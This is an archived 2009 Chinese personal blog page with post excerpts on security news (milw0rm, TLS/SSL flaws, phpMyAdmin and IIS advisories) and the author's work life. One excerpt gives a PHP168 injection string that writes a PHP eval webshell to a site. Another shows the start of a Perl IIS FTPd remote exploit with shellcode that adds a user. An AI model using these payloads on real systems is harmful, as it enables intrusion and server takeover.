rosicky311(小浩)[HACKBASE]
百度空间 | 百度首页 
 
招聘
 
 
     
 
文章列表
 
2009-11-06 12:30

一直有订阅milw0rm的RSS~可最近一个多月网站都没更新~很纳闷是为啥~

看到了下面的新闻

Str0ke @ Milworm's Funeral is This Friday

Many of us have wondered where str0ke has been and why milw0rm has not been updated in a good while.
 
2009-11-06 12:29

转自:CB

PhoneFactor公司的两名安全专家Marsh Ray与Steve Dispensa近日公开了他们在TLS/SSL安全协议中发现的安全漏洞。TLS (传输层保密协议Transport Layer Security)以及SSL(Socket层保密协议Secure Sockets Layer)是两个被在线零售商在网络交易过程中广泛使用的安保协议。两位专家本周四在自己的博客上公开了这两个安全协议中的漏洞,Ray今年8月份首次发现了这些漏洞,并于9月初将这些漏洞展示给Dispensa。专家们表示,

 
2009-11-01 11:07
*** Windows Media Player Plugin: Local File Detection Vulnerability ***

A design flaw in Windows Media Player 11 allows a remote attacker to determine the \
presence of local files (programs, documents, etc.). I sent an e-mail to Microsoft \
(nearly a year ago) but they never responded…

Windows Media Player permits to open locally stored media-files. Opening \
non-supported files usually provokes an error message. By a simple HTTP-redirect, the \
error mes
 
2009-10-25 11:24
发布时间:2009-10-12
影响版本:
phpMyAdmin 3.x
phpMyAdmin 2.11.x
漏洞描述:
BUGTRAQ  ID: 36658
CVE ID: CVE-2009-3697,CVE-2009-3696

phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。

phpMyAdmin没有正确地过滤对MySQL表格名称所提交的输入参数,远程攻击者可以通过提交恶意请求执行存储式跨站脚本攻击,并在用户浏览恶
 
2009-10-19 11:09
业务部门3个月轮岗马上结束了~本周四就去客服培训了~
再经过3个月客服的轮岗 咱就定岗了~~
 
2009-10-17 22:32
影响版本:
Microsoft IIS 7.0
Microsoft IIS 6.0
Microsoft IIS 5.1
Microsoft IIS 5.0
漏洞描述:
BUGTRAQ  ID: 36273
CVE ID: CVE-2009-2521

Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。

IIS的FTPd的Glob功能在处理递归目录列表请求时存在栈溢出漏洞,拥有对目录写访问权限的远程攻击者可以
 
2009-10-14 13:21

今天无意间在几个朋友的BLOG不约而同的看到了网络公司招聘网络安全人员~其中百度公开面对校园应届生招聘安全工程师,没记错去年的这个时候我也投了百度的简历~不过由于本人的专业和安全相差千里,投递的是别的岗位~结果被BS了~面试机会都没给~哎~尴尬

对于这个岗位,个人觉得百度也好,其他公司也好,可以适当放宽硬性指标要求,什么211,什么奖学金,什么四六级~适当的放宽些,尤其对学校~还有适当用网络力量,在各大知名的安全站点做做文章没准就能有什么收获~

毕竟这些人更多的是面对最直接的实践,说实话对于

 
2009-10-08 09:59

加班3天 宅5天~生活过得算安逸~

 
2009-10-01 09:25
RT~
中心8个人加班~偌大的办公室突然很空荡~
 
2009-09-24 10:46

很尴尬啊~上午打开BLOG~昨天更新的文章被和谐了~

看来开心+人人的力量很强大啊~

 
2009-09-10 09:12

微软昨天凌晨如期发布了2009年9月份的五个月度安全补丁,全部属于最高级别的关键级,修复了多个秘密报告的安全漏洞,不过最新的Windows 7/Server 2008 R2不受影响。本公告摘要替代 2009 年 9 月 3 日最初发布的公告预先通知。

查看:icrosoft 安全公告摘要(2009 年 9 月)

1、公告编号:MS09-045

知识库编号:

 
2009-09-10 09:11
转自:鬼仔

来源:chinesehonker

危险等级:高

影响版本:PHP168 6.0以下版本

入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。

测试语句:
?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?

 
2009-09-01 09:00
# IIS 5.0 FTPd / Remote r00t exploit 
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a
 
2009-08-26 14:34
PS:悲剧的百度 被和谐掉了
看这里把
传送门:http://www.scanw.com/blog/archives/1133
 
2009-08-24 14:43
有网游行业经验者优先,有兴趣的朋友可以把简历发我邮箱rosicky311@gmail.com
 
     
 
 
个人档案
 
rosicky311
男, 23岁
吉林 长春 
上次登录:
12小时前
加为好友
 
   
 
文章分类
 
 
 
 
 
 
 
 
     
 
宠物专区
 
   
 
订阅我的空间
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     
 
最新评论
 
文章评论|照片评论


让他真正死一次···
 

回复1012859033:那是因为你这人渣靠成的。。。
 
 

晕撒 客服额 我们公司招聘客服来一个干跑一个 那活不好干哦
 

服务人民能学到更多的,不错
 
不是Ipone or M8
this is shan zhai
 
     
 
背景音乐
 
 
最近访客
 
 

要命的名儿

正月初五5

公主也闭关

kylin987

51webshell

cfengsha

998877_0

yang520065
     
 
好友最新文章
 
     


©2009 Baidu